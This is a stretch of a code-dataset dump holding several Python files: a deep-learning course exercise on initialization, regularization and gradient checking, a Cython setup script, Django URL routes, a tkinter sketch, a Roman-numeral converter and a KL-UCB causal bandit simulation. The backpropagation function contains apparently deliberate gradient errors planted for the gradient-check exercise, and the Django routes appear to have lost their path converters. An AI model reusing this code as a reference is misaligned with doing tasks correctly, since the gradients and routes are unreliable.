theta[46:47].reshape((1,1))\n\n return parameters\n\ndef gradients_to_vector(gradients):\n\n count = 0\n for key in [\"dW1\", \"db1\", \"dW2\", \"db2\", \"dW3\", \"db3\"]:\n # flatten parameter\n new_vector = np.reshape(gradients[key], (-1,1))\n \n if count == 0:\n theta = new_vector\n else:\n theta = np.concatenate((theta, new_vector), axis=0)\n count = count + 1\n\n return theta\n\n#梯度检验中的前向传播\ndef forward_propagation_n(X, Y, parameters):\n\n m = X.shape[1]\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n\n 
# LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID\n Z1 = np.dot(W1, X) + b1\n A1 = relu(Z1)\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n\n # Cost\n logprobs = np.multiply(-np.log(A3),Y) + np.multiply(-np.log(1 - A3), 1 - Y)\n cost = 1./m * np.sum(logprobs)\n \n cache = (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3)\n \n return cost, cache\n\n#梯度检验中的反向传播\ndef backward_propagation_n(X, Y, cache):\n m = X.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n \n dZ3 = A3 - Y\n dW3 = 1./m * np.dot(dZ3, A2.T)\n db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n \n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1./m * np.dot(dZ2, A1.T) * 2\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1./m * np.dot(dZ1, X.T)\n db1 = 4./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\n \"dA2\": dA2, \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2,\n \"dA1\": dA1, \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients\n\n#三种Initialization比较\ntrain_X, train_Y, test_X, test_Y = load_dataset()\nlayers = [train_X.shape[0], 10, 5, 1] #设置神经网络层数及节点数\n\n#参数初始化为0\nparameters_init_zeros = model(train_X, train_Y, layers_dims = layers, initialization = \"zeros\")\n\n#初始化random\nparameters_init_random = model(train_X, train_Y, layers_dims = layers, initialization = \"random\")\n\n#Xavier初始化\nparameters_init_he = model(train_X, train_Y, layers_dims = layers, initialization = \"he\")\n\n#参数初始化为0时\nplt.title(\"Model with Zeros initialization\")\naxes = plt.gca()\naxes.set_xlim([-1.5,1.5])\naxes.set_ylim([-1.5,1.5])\nplot_decision_boundary(lambda x: predict_dec(parameters_init_zeros, x.T), train_X, train_Y)\nprint (\"训练集中:\")\npredictions_train = predict(train_X, train_Y, parameters_init_zeros)\nprint (\"测试集中:\")\npredictions_test = predict(test_X, test_Y, parameters_init_zeros)\n\n#参数初始化为random时\nplt.title(\"Model with large random initialization\")\naxes = plt.gca()\naxes.set_xlim([-1.5,1.5])\naxes.set_ylim([-1.5,1.5])\nplot_decision_boundary(lambda x: predict_dec(parameters_init_random, x.T), train_X, train_Y)\nprint (\"训练集中:\")\npredictions_train = predict(train_X, train_Y, parameters_init_random)\nprint (\"测试集中:\")\npredictions_test = predict(test_X, test_Y, parameters_init_random)\n\n#Xavier初始化\nplt.title(\"Model with He initialization\")\naxes = plt.gca()\naxes.set_xlim([-1.5,1.5])\naxes.set_ylim([-1.5,1.5])\nplot_decision_boundary(lambda x: predict_dec(parameters_init_he, x.T), train_X, train_Y)\nprint (\"训练集中:\")\npredictions_train = predict(train_X, train_Y, parameters_init_he)\nprint (\"测试集中:\")\npredictions_test = predict(test_X, test_Y, parameters_init_he)\n\n#几种Regularization比较\ntrain_x, train_y, test_x, test_y = load_2D_dataset()\nlayers = [train_x.shape[0], 20, 3, 1] #设置神经网络层数及节点数\n\n#不进行正则化\nparameters_no_reg = model(train_x, train_y, layers_dims = layers, learning_rate = 0.3, num_iterations = 30000)\n\n#采用L2正则化\nparameters_L2_reg = model(train_x, train_y, layers_dims = layers, learning_rate = 0.3, num_iterations = 30000, lambd = 0.7)\n\n#采用DropOut正则化\nparameters_dropout_reg = model(train_x, train_y, layers_dims = layers, learning_rate = 0.3, num_iterations = 30000, keep_prob = 0.86)\n\n#不进行正则化\nplt.title(\"Model without regularization\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters_no_reg, 
x.T), train_x, train_y)\nprint (\"训练集中:\")\npredictions_train = predict(train_x, train_y, parameters_no_reg)\nprint (\"测试集中:\")\npredictions_test = predict(test_x, test_y, parameters_no_reg)\n\n#进行L2正则化\nplt.title(\"Model with L2-regularization\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters_L2_reg, x.T), train_x, train_y)\nprint (\"训练集中:\")\npredictions_train = predict(train_x, train_y, parameters_L2_reg)\nprint (\"测试集中:\")\npredictions_test = predict(test_x, test_y, parameters_L2_reg)\n\n#DropOut正则化\nplt.title(\"Model with dropout\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters_dropout_reg, x.T), train_x, train_y)\nprint (\"训练集中:\")\npredictions_train = predict(train_x, train_y, parameters_dropout_reg)\nprint (\"测试集中:\")\npredictions_test = predict(test_x, test_y, parameters_dropout_reg)\n\n#梯度检验\ndef gradient_check_n(parameters, gradients, X, Y, epsilon = 1e-7):\n\n parameters_values, _ = dictionary_to_vector(parameters)\n grad = gradients_to_vector(gradients)\n num_parameters = parameters_values.shape[0]\n J_plus = np.zeros((num_parameters, 1))\n J_minus = np.zeros((num_parameters, 1))\n gradapprox = np.zeros((num_parameters, 1))\n \n for i in range(num_parameters):\n \n thetaplus = np.copy(parameters_values) \n thetaplus[i][0] = thetaplus[i][0] + epsilon \n J_plus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(thetaplus)) \n \n thetaminus = np.copy(parameters_values) \n thetaminus[i][0] = thetaminus[i][0] - epsilon \n J_minus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(thetaminus)) \n gradapprox[i] = (J_plus[i] - J_minus[i])/(2*epsilon) \n \n numerator = np.linalg.norm(grad - gradapprox) \n denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox) \n difference = numerator/denominator \n\n if difference > 1e-7:\n print (\"\\033[93m\" + \"There is a mistake in the backward propagation! difference = \" + str(difference) + \"\\033[0m\")\n else:\n print (\"\\033[92m\" + \"Your backward propagation works perfectly fine! 
difference = \" + str(difference) + \"\\033[0m\")\n \n return difference\n\n","repo_name":"qwe2508/deeplearningcourse","sub_path":"neural_network_improve_Python/Initialization_Regularization_Gradient-Checking.py","file_name":"Initialization_Regularization_Gradient-Checking.py","file_ext":"py","file_size_in_byte":18638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21685158211","text":"from distutils.core import setup, Extension\nfrom Cython.Build import cythonize\nimport numpy as np\n\next = Extension(\"gbssl\",sources=[\"nodes.c\",\"pairs.c\",\"graph.c\",\"potts.c\",\n \"ssl.c\",\"interface.pyx\"],\n libraries=[\"gsl\",\"gslcblas\"],\n extra_compile_args=[\"-fopenmp\", \"-I/usr/include/gsl -lgsl -lgslblasnative\"],\n extra_link_args=[\"-fopenmp\", \"-I/usr/include/gsl -lgsl -lgslblasnative\"],\n include_dirs=[np.get_include()],\n language=\"c\")\n\nsetup(ext_modules=cythonize(ext))","repo_name":"boureau93/ssl-nmf","sub_path":"lib/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5329673150","text":"from django.urls import path\nfrom .views import note_list, note_detail, note_create, note_delete\n\n\nurlpatterns = [\n path('', note_list, name='list'),\n path('/', note_detail, name='detail'),\n path('create/', note_create, name='create'),\n path('delete/', note_delete, name='delete'),\n]","repo_name":"MironBerch/collection-of-projects","sub_path":"Crud-Django-App/crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"27583185130","text":"import tkinter as tk\n\nroot = tk.Tk()\nf_height = 1000\nf_width =500\nroot.geometry(\"1000x500\")\nframe = tk.Frame(root, height= f_height, width= f_width)\ncan = tk.Canvas(frame)\nx1,y1,x2,y2 = 0,10,20,400\n\nfor i in range(100):\n x1+= 30\n x2+= 30\n can.create_rectangle(x1,y1,x2,y2,fill=\"yellow\")\n frame.pack()\n can.pack()\nroot.mainloop()","repo_name":"Trent-Farley/All-Code","sub_path":"Python_2/Assignment_6/graph_search.py","file_name":"graph_search.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"46221721523","text":"numbers = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n\n\ndef convert(s):\n total = 0\n last = 0\n\n for n in map(lambda c: numbers[c], reversed(list(s))):\n if n >= last:\n total += n\n last = n\n else:\n total -= n\n last = n\n\n return total\n\nprint(convert(input()))\n\n","repo_name":"RomanVlasenko/adaptive-python","sub_path":"5_4_Roman_number_to_decimal.py","file_name":"5_4_Roman_number_to_decimal.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1388774726","text":"import numpy as np\nimport pandas as pd\nimport copy\nimport pickle\nimport matplotlib.pyplot as plt\n\ndef RunKLUCB(numRound, listHB, listLB, listU, TF_causal, TF_naive, TF_CF, listnOBS, listUobs):\n def MaxKL(mu_hat, ft, NaT, init_maxval=1):\n def BinoKL(mu_hat, mu):\n if mu_hat == mu:\n return 0\n else:\n result = mu_hat * np.log(mu_hat / mu) + (1 - mu_hat) * np.log((1 - mu_hat) / (1 - mu))\n return result\n\n def MaxBinarySearch(mu_hat, M, maxval):\n if M < 0:\n print(mu_hat, M, \"ERROR\")\n terminal_cond = 
1e-8\n eps = 1e-12\n if mu_hat == 1:\n return 1\n elif mu_hat == 0:\n mu_hat += eps # diff\n mu = copy.copy(mu_hat)\n\n iteridx = 0\n while 1:\n iteridx += 1\n mu_cand = (mu + maxval) / 2\n KL_val = BinoKL(mu_hat, mu_cand)\n diff = np.abs(KL_val - M)\n # print(mu, mu_hat, mu_cand,KL_val, M, diff)\n if diff < terminal_cond:\n mu = mu_cand\n return mu\n\n if KL_val < M:\n mu = copy.copy(mu_cand)\n else:\n maxval = copy.copy(mu_cand)\n\n if np.abs(mu - maxval) < terminal_cond:\n return mu\n\n if iteridx > 20:\n return mu\n maxval = copy.copy(init_maxval)\n M = ft / NaT\n mu = MaxBinarySearch(mu_hat, M, maxval)\n return mu\n\n def MaxKLInverse(mu_hat, C, init_maxval):\n def BinoKL(mu, mu_hat):\n if mu_hat == mu:\n return 0\n else:\n result = mu * np.log(mu / mu_hat) + (1 - mu) * np.log((1 - mu) / (1 - mu_hat))\n return result\n\n def MaxBinarySearch(mu_hat, C, maxval):\n terminal_cond = 1e-8\n eps = 1e-12\n if mu_hat == 1:\n return 1\n elif mu_hat == 0:\n mu_hat += eps # diff\n mu = copy.copy(mu_hat)\n\n iteridx = 0\n while 1:\n iteridx += 1\n mu_cand = (mu + maxval) / 2\n KL_val = BinoKL(mu_cand, mu_hat)\n diff = np.abs(KL_val - C)\n # print(mu, mu_hat, mu_cand,KL_val, M, diff)\n if diff < terminal_cond:\n mu = mu_cand\n return mu\n\n if KL_val < C:\n mu = copy.copy(mu_cand)\n else:\n maxval = copy.copy(mu_cand)\n\n if np.abs(mu - maxval) < terminal_cond:\n return mu\n\n if iteridx > 20:\n return mu\n maxval = copy.copy(init_maxval)\n mu = MaxBinarySearch(mu_hat, C, maxval)\n return mu\n\n def ComputeDynamicMean(n, prevM, lastElem):\n M = ((n - 1) * prevM + lastElem) / n\n return M\n\n def UpdateAfterArm(dictNumArm, dictM, dictLastElem, armChosen, reward):\n dictNumArm[armChosen] += 1\n dictLastElem[armChosen] = reward\n dictM[armChosen] = ComputeDynamicMean(dictNumArm[armChosen], dictM[armChosen], reward)\n return [dictNumArm, dictM, dictLastElem]\n\n ''' Definition of variable '''\n dictNumArm = dict() # Number of pulling arm a\n dictM = dict() # Average of reward of arm a\n dictLastElem = dict() # previous reward of arm a\n listTFArmCorrect = list() # 1 if arm a = optimal arm // 0 otherwise.\n listCummRegret = list() # cummulative regret += E[Y|do(X=optimal)] - E[Y|do(X=a)]\n\n armOpt = np.argmax(listU)\n cummRegret = 0\n armDomain = np.arange(len(listU))\n\n for a in armDomain:\n if TF_naive == True:\n dictNumArm[a] = listnOBS[a]\n dictM[a] = listUobs[a]\n dictLastElem[a] = 0\n else:\n dictNumArm[a] = 0\n dictM[a] = 0\n dictLastElem[a] = 0\n\n ''' Initial pulling'''\n # Pulling all arm at once.\n for a in armDomain:\n u0,u1 = fU()\n reward = fY(u0,u1,a)\n\n dictNumArm, dictM, dictLastElem = UpdateAfterArm(dictNumArm,dictM,dictLastElem, a, reward)\n cummRegret += listU[armOpt] - listU[a]\n listCummRegret.append(cummRegret)\n if a == armOpt:\n listTFArmCorrect.append(1)\n else:\n listTFArmCorrect.append(0)\n\n ''' Run!'''\n f = lambda x: np.log(x) + 3 * np.log(np.log(x))\n list_listUpper = []\n for idxround in range(numRound-len(armDomain)):\n t = idxround + len(armDomain) + 1 # t=3,4,...,nRound+2 // total nRound.\n # Compute the mean reward\n listUpper = list() # Each arm's upper confidence.\n listHB_CF = np.zeros(len(armDomain))\n listLB_CF = np.zeros(len(armDomain))\n for a in armDomain:\n # Compute\n armDomain_noa = [aidx for aidx in armDomain if aidx != a]\n mu_hat = dictM[a] # Average rewards of arm a up to (t-1)\n ft = f(t)\n # print(t, a, mu_hat, ft, dictNumArm[a])\n upper_a = MaxKL(mu_hat,ft,dictNumArm[a],init_maxval=1) # argmax_u KL(mu_hat, u) < (ft/Na(t)) s.t. 
0<= u <= 1.\n if TF_causal:\n upper_a = np.max([np.min([listHB[a], upper_a]),listLB[a]])\n elif TF_CF:\n f_delta = lambda n,delta: np.sqrt( (1/(2*n))*np.log(1/delta) )\n HB_cf_sumval = 0\n LB_cf_sumval = 0\n for aidx in armDomain_noa:\n px_obs = px[aidx]\n px_dot = dictNumArm[aidx]/sum(dictNumArm.values())\n C = -np.log(px_dot)\n\n HB_cf = MaxKLInverse(min(mu_hat+f_delta(dictNumArm[a],0.99),0.01),C,init_maxval=1)\n LB_cf = MaxKLInverse(max(mu_hat-f_delta(dictNumArm[a],0.01),0.01),C,init_maxval=0)\n\n HB_cf_sumval += (HB_cf * px_obs)\n LB_cf_sumval += (LB_cf * px_obs)\n\n listHB_CF[a] = min(listLB[a] + HB_cf_sumval,1.0)\n listLB_CF[a] = min(listLB[a] + LB_cf_sumval,1.0)\n\n # print(t, a, listLB_CF[a], mu_hat, listHB_CF[a])\n\n upper_a = np.max([np.min([listHB_CF[a], upper_a]), listLB_CF[a]])\n listUpper.append(upper_a)\n list_listUpper.append(listUpper)\n # print(t,listUpper)\n armChosen = np.argmax(listUpper)\n\n u0, u1 = fU()\n reward = fY(u0, u1, armChosen)\n\n # reward = fY(armChosen, u)\n # reward = np.random.binomial(1, listU[armChosen])\n dictNumArm, dictM, dictLastElem = UpdateAfterArm(dictNumArm, dictM, dictLastElem, armChosen, reward)\n\n cummRegret += (np.max(listU) - listU[armChosen])\n if armChosen == armOpt:\n listTFArmCorrect.append(1)\n else:\n listTFArmCorrect.append(0)\n listCummRegret.append(cummRegret)\n return np.asarray(listTFArmCorrect), np.asarray(listCummRegret), list_listUpper\n\ndef fU():\n U0 = np.random.binomial(1, 0.2)\n U1 = np.random.binomial(1, 0.5)\n return U0,U1\n\ndef fY(U0,U1,X):\n return (U0|U1)^X\n\ndef GenParam(nOBS):\n np.random.seed(1)\n N = nOBS\n U0 = np.random.binomial(1, 0.2, N)\n U1 = np.random.binomial(1, 0.5, N)\n X = np.random.binomial(1, 0.4, N) * (1 - (U0 ^ U1))\n numX = len(np.unique(X))\n px = [1-np.mean(X),np.mean(X)]\n Y = fY(U0, U1, X)\n\n OBS = pd.DataFrame({'X': X, 'Y': Y})\n\n X0 = np.array([0] * N)\n X1 = np.array([1] * N)\n Y0 = fY(U0, U1, X0)\n Y1 = fY(U0, U1, X1)\n\n print('Y0:', np.mean(Y0))\n print('Y1:', np.mean(Y1))\n print('Y|x0:', np.mean(OBS[OBS['X'] == 0]['Y']))\n print('Y|x1:', np.mean(OBS[OBS['X'] == 1]['Y']))\n\n # Bound\n l0 = np.mean(OBS[OBS['X'] == 0]['Y']) * (1 - np.mean(X))\n l1 = np.mean(OBS[OBS['X'] == 1]['Y']) * (np.mean(X))\n h0 = l0 + np.mean(X)\n h1 = l1 + (1 - np.mean(X))\n\n listU = [np.mean(Y0), np.mean(Y1)]\n listHB = [h0,h1]\n listLB = [l0,l1]\n\n print(l0, np.mean(Y0), h0)\n print(l1, np.mean(Y1), h1)\n return listU,listLB,listHB,px\n\nif __name__ == \"__main__\":\n numRound = 5000\n numSim = 100\n nOBS = 5000\n\n listU, listLB, listHB,px = GenParam(nOBS)\n\n ''' PARAM 0, 181030 '''\n\n\n # ''' PARAM 1 '''\n # U = np.random.normal(loc=0.5,scale=1,size=nOBS) + np.random.rand(nOBS)\n # X = fX(U)\n # px = [1-np.mean(X),np.mean(X)]\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # Y = fY(X,U)\n # Y0 = fY(X0,U)\n # Y1 = fY(X1,U)\n # OBS = pd.DataFrame({'X':X,'Y':Y})\n # Yo_0 = np.array(OBS[OBS['X']==0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n #\n # listU = [np.mean(Y0),np.mean(Y1)]\n # listLB = [np.mean(Yo_0)*px[0],np.mean(Yo_1)*px[1]]\n # listHB = [listLB[0] + px[1-0], listLB[1] + px[1-1]]\n\n ''' PARAM 2 '''\n # U = np.random.normal(loc=0.5, scale=1, size=nOBS) + np.random.rand(nOBS)\n # numX = 2\n # bincut = [0.2,0.4]\n # def fX(u, numX, bincut):\n # g = 2 * (U - 0.5) + 0.2 * np.random.normal(loc=0, scale=1, size=len(u))\n # X = np.exp(g) / (np.exp(g) + 1)\n # if numX == 2:\n # X = np.round(X)\n # else:\n # mybin = [0] + bincut + [1]\n # np.digitize(X, mybin)\n # return X\n # 
X = fX(U,numX,bincut)\n # px = [1 - np.mean(X), np.mean(X)]\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # Y = fY(X, U)\n # Y0 = fY(X0, U)\n # Y1 = fY(X1, U)\n # OBS = pd.DataFrame({'X': X, 'Y': Y})\n # Yo_0 = np.array(OBS[OBS['X'] == 0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n #\n # listU = [np.mean(Y0), np.mean(Y1)]\n # listLB = [np.mean(Yo_0) * px[0], np.mean(Yo_1) * px[1]]\n # listHB = [listLB[0] + px[1 - 0], listLB[1] + px[1 - 1]]\n\n ''' PARAM 3 '''\n # U = np.random.normal(loc=0.5, scale=2, size=nOBS) + 0.5*np.random.rand(nOBS)\n # numX = 4\n # bincut = [40,50,90]\n # def fX(u, numX, bincut):\n # rand_noise = 0.2 * np.random.normal(loc=0, scale=1, size=len(u))\n # X = 2 * (U - 0.3) + ((U-1)**2) + 1 + rand_noise\n # X = np.exp(X) / (np.exp(X) + 1)\n # if numX == 2:\n # X = np.round(X)\n # else:\n # mybin = [0] + list(np.percentile(X,q=bincut)) + [1]\n # X=np.digitize(X, mybin)\n # X = X-1\n # return X\n # X = fX(U,numX,bincut)\n # px = [list(X).count(idx)/nOBS for idx in range(numX-1)]\n # px = px + [1-sum(px)]\n #\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # X2 = np.array([2] * nOBS)\n # X3 = np.array([3] * nOBS)\n # # fY = lambda x, u: np.exp(-0.6 * x + 0.3 * u) / (np.exp(-0.6 * x + 0.3 * u) + 1)\n # Y = fY(X, U)\n # Y0 = fY(X0, U)\n # Y1 = fY(X1, U)\n # Y2 = fY(X2, U)\n # Y3 = fY(X3, U)\n # OBS = pd.DataFrame({'X': X, 'Y': Y})\n # Yo_0 = np.array(OBS[OBS['X'] == 0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n # Yo_2 = np.array(OBS[OBS['X'] == 2]['Y'])\n # Yo_3 = np.array(OBS[OBS['X'] == 3]['Y'])\n # listU = [np.mean(Y0), np.mean(Y1), np.mean(Y2), np.mean(Y3)]\n # listLB = [np.mean(Yo_0) * px[0], np.mean(Yo_1) * px[1], np.mean(Yo_2) * px[2], np.mean(Yo_3) * px[3]]\n # listHB = []\n # for idx in range(len(px)):\n # temp = [px[i] for i in range(len(px)) if i != idx]\n # listHB.append(listLB[idx] + sum(temp))\n\n ''' PARAM 4 '''\n # U = np.random.rand(nOBS)\n # standard = [100*np.percentile(U,q=30),100*np.percentile(U,q=10),100*np.percentile(U,q=40),100*np.percentile(U,q=20)]\n # px = np.random.dirichlet(standard)\n # X = np.random.choice(len(px),nOBS,replace=True,p=px)\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # X2 = np.array([2] * nOBS)\n # X3 = np.array([3] * nOBS)\n # # fY = lambda x, u: np.exp(-0.6 * x + 0.3 * u) / (np.exp(-0.6 * x + 0.3 * u) + 1)\n # Y = fY(X, U)\n # Y0 = fY(X0, U)\n # Y1 = fY(X1, U)\n # Y2 = fY(X2, U)\n # Y3 = fY(X3, U)\n # OBS = pd.DataFrame({'X': X, 'Y': Y})\n # Yo_0 = np.array(OBS[OBS['X'] == 0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n # Yo_2 = np.array(OBS[OBS['X'] == 2]['Y'])\n # Yo_3 = np.array(OBS[OBS['X'] == 3]['Y'])\n # listU = [np.mean(Y0), np.mean(Y1), np.mean(Y2), np.mean(Y3)]\n # listLB = [np.mean(Yo_0) * px[0], np.mean(Yo_1) * px[1], np.mean(Yo_2) * px[2], np.mean(Yo_3) * px[3]]\n # listHB = []\n # for idx in range(len(px)):\n # temp = [px[i] for i in range(len(px)) if i != idx]\n # listHB.append(listLB[idx] + sum(temp))\n\n ''' PARAM 5 '''\n # px = [0.1, 0.6, 0.3]\n # U = np.random.rand(nOBS)\n # X = np.random.choice(len(px),nOBS,replace=True,p=px)\n # X0 = np.array([0] * nOBS)\n # X1 = np.array([1] * nOBS)\n # X2 = np.array([2] * nOBS)\n # # fY = lambda x, u: np.exp(1*x - 2*u)/(np.exp(1*x - 2*u)+1)\n # Y = fY(X, U)\n # Y0 = fY(X0, U)\n # Y1 = fY(X1, U)\n # Y2 = fY(X2, U)\n #\n # OBS = pd.DataFrame({'X': X, 'Y': Y})\n # Yo_0 = np.array(OBS[OBS['X'] == 0]['Y'])\n # Yo_1 = np.array(OBS[OBS['X'] == 1]['Y'])\n # Yo_2 = np.array(OBS[OBS['X'] == 2]['Y'])\n # Yo_3 = 
np.array(OBS[OBS['X'] == 3]['Y'])\n # listU = [np.mean(Y0), np.mean(Y1), np.mean(Y2)]\n # listLB = [np.mean(Yo_0) * px[0], np.mean(Yo_1) * px[1], np.mean(Yo_2) * px[2]]\n #\n # listHB = []\n # for idx in range(len(px)):\n # temp = [px[i] for i in range(len(px)) if i != idx]\n # listHB.append(listLB[idx] + sum(temp))\n\n ''' MAB '''\n arrayTF = np.array([0] * numRound)\n arrayCUM = np.array([0] * numRound)\n matTF = np.zeros((numSim, numRound))\n matCUM = np.zeros((numSim, numRound))\n dictUP = dict()\n for k in range(numSim):\n print(k,'standard')\n TF, CUM, UP = RunKLUCB(numRound, listHB, listLB, listU, TF_causal=False, TF_naive=False, TF_CF=False, listnOBS=[100, 100],\n listUobs=[0, 0])\n\n matTF[k, :] = TF\n matCUM[k, :] = CUM\n dictUP[k] = np.array(UP)\n arrayTF = arrayTF + TF\n arrayCUM = arrayCUM + CUM\n print(\"HB\",listHB)\n arrayTF = arrayTF / numSim\n arrayCUM = arrayCUM / numSim\n\n arrayTF_C = np.array([0] * numRound)\n arrayCUM_C = np.array([0] * numRound)\n matTF_C = np.zeros((numSim, numRound))\n matCUM_C = np.zeros((numSim, numRound))\n dictUP_C = dict()\n for k in range(numSim):\n print(k, 'C')\n TF_C, CUM_C, UP_C = RunKLUCB(numRound, listHB, listLB, listU, TF_causal=True, TF_naive=False, TF_CF=False,\n listnOBS=[100, 100], listUobs=[0, 0])\n matTF_C[k, :] = TF_C\n matCUM_C[k, :] = CUM_C\n dictUP_C[k] = np.array(UP_C)\n arrayTF_C = arrayTF_C + TF_C\n arrayCUM_C = arrayCUM_C + CUM_C\n print(\"HB\", listHB)\n arrayTF_C = arrayTF_C / numSim\n arrayCUM_C = arrayCUM_C / numSim\n\n arrayTF_CF = np.array([0] * numRound)\n arrayCUM_CF = np.array([0] * numRound)\n matTF_CF = np.zeros((numSim, numRound))\n matCUM_CF = np.zeros((numSim, numRound))\n dictUP_CF = dict()\n for k in range(numSim):\n print(k, 'CF')\n TF_CF, CUM_CF, UP_CF = RunKLUCB(numRound, listHB, listLB, listU, TF_causal=False, TF_naive=False, TF_CF=True,\n listnOBS=[100, 100], listUobs=[0, 0])\n matTF_CF[k, :] = TF_CF\n matCUM_CF[k, :] = CUM_CF\n dictUP_CF[k] = np.array(UP_CF)\n arrayTF_CF = arrayTF_CF + TF_CF\n arrayCUM_CF = arrayCUM_CF + CUM_CF\n print(\"HB\", listHB)\n arrayTF_CF = arrayTF_CF / numSim\n arrayCUM_CF = arrayCUM_CF / numSim\n\n xDomain = np.arange(numRound)\n alpha = 0.05\n colorAlpha = 0.3\n linewidthval = 2\n tt = np.arange(0,numRound,200)\n\n plt.figure(1,figsize=(8,5))\n # plt.title('Cum.Reg')\n plt.plot(xDomain[tt], arrayCUM[tt], 'red', label='klUCB',linewidth=linewidthval)\n plt.plot(xDomain[tt], arrayCUM[tt], 'ro')\n # plt.fill_between(xDomain[tt], np.percentile(matCUM[:,tt], q=100 * alpha, axis=0),\n # np.percentile(matCUM[:,tt], q=100 * (1 - alpha), axis=0), facecolor='red', alpha=colorAlpha)\n plt.plot(xDomain[tt], arrayCUM_C[tt], 'blue', label='klUCB-C',linewidth=linewidthval)\n plt.plot(xDomain[tt], arrayCUM_C[tt], 'bo')\n # plt.fill_between(xDomain[tt], np.percentile(matCUM_C[:,tt], q=100 * alpha, axis=0),\n # np.percentile(matCUM_C[:,tt], q=100 * (1 - alpha), axis=0), facecolor='blue', alpha=colorAlpha)\n plt.plot(xDomain[tt], arrayCUM_CF[tt], 'green', label='klUCB-CF',linewidth=linewidthval)\n plt.plot(xDomain[tt], arrayCUM_CF[tt], 'go')\n # plt.fill_between(xDomain[tt], np.percentile(matCUM_CF[:,tt], q=100 * alpha, axis=0),\n # np.percentile(matCUM_CF[:,tt], q=100 * (1 - alpha), axis=0), facecolor='green', alpha=colorAlpha)\n plt.legend(loc='upper left',fontsize=15)\n plt.ylabel('Cum.Reg',fontsize=15)\n plt.xticks(fontsize=15)\n plt.yticks(fontsize=15)\n\n plt.figure(2)\n plt.title('Opt.Prob')\n plt.plot(xDomain, arrayTF, 'red', label='klUCB')\n plt.fill_between(xDomain, 
np.percentile(matTF, q=100 * alpha, axis=0),\n np.percentile(matTF, q=100 * (1 - alpha), axis=0), facecolor='red', alpha=colorAlpha)\n plt.plot(xDomain, arrayTF_C, 'blue', label='klUCB-C')\n plt.fill_between(xDomain, np.percentile(matTF_C, q=100 * alpha, axis=0),\n np.percentile(matTF_C, q=100 * (1 - alpha), axis=0), facecolor='blue', alpha=colorAlpha)\n # plt.plot(xDomain, arrayTF_CF, 'green', label='klUCB-CF')\n # plt.fill_between(xDomain, np.percentile(matTF_CF, q=100 * alpha, axis=0),\n # np.percentile(matTF_CF, q=100 * (1 - alpha), axis=0), facecolor='green', alpha=colorAlpha)\n plt.legend()\n plt.show()\n\n pickle.dump(listHB,open('Result/listHB.pkl','wb'))\n pickle.dump(listU, open('Result/listU.pkl', 'wb'))\n pickle.dump(listLB, open('Result/listLB.pkl', 'wb'))\n pickle.dump(dictUP,open('Result/dictUP.pkl','wb'))\n pickle.dump(dictUP_C, open('Result/dictUP_C.pkl', 'wb'))\n pickle.dump(dictUP_CF, open('Result/dictUP_CF.pkl', 'wb'))\n pickle.dump(matTF, open('Result/MatTF.pkl', 'wb'))\n pickle.dump(matTF_C, open('Result/MatTF_C.pkl', 'wb'))\n pickle.dump(matTF_CF, open('Result/MatTF_CF.pkl', 'wb'))\n pickle.dump(matCUM, open('Result/MatCUM.pkl', 'wb'))\n pickle.dump(matCUM_C, open('Result/MatCUM_C.pkl', 'wb'))\n pickle.dump(matCUM_CF, open('Result/MatCUM_CF.pkl', 'wb'))\n\n k = 19\n plt.plot(matCUM[k,:], 'b', label='klUCB')\n plt.plot(matCUM_C[k,:], 'r', label='klUCB-C')\n 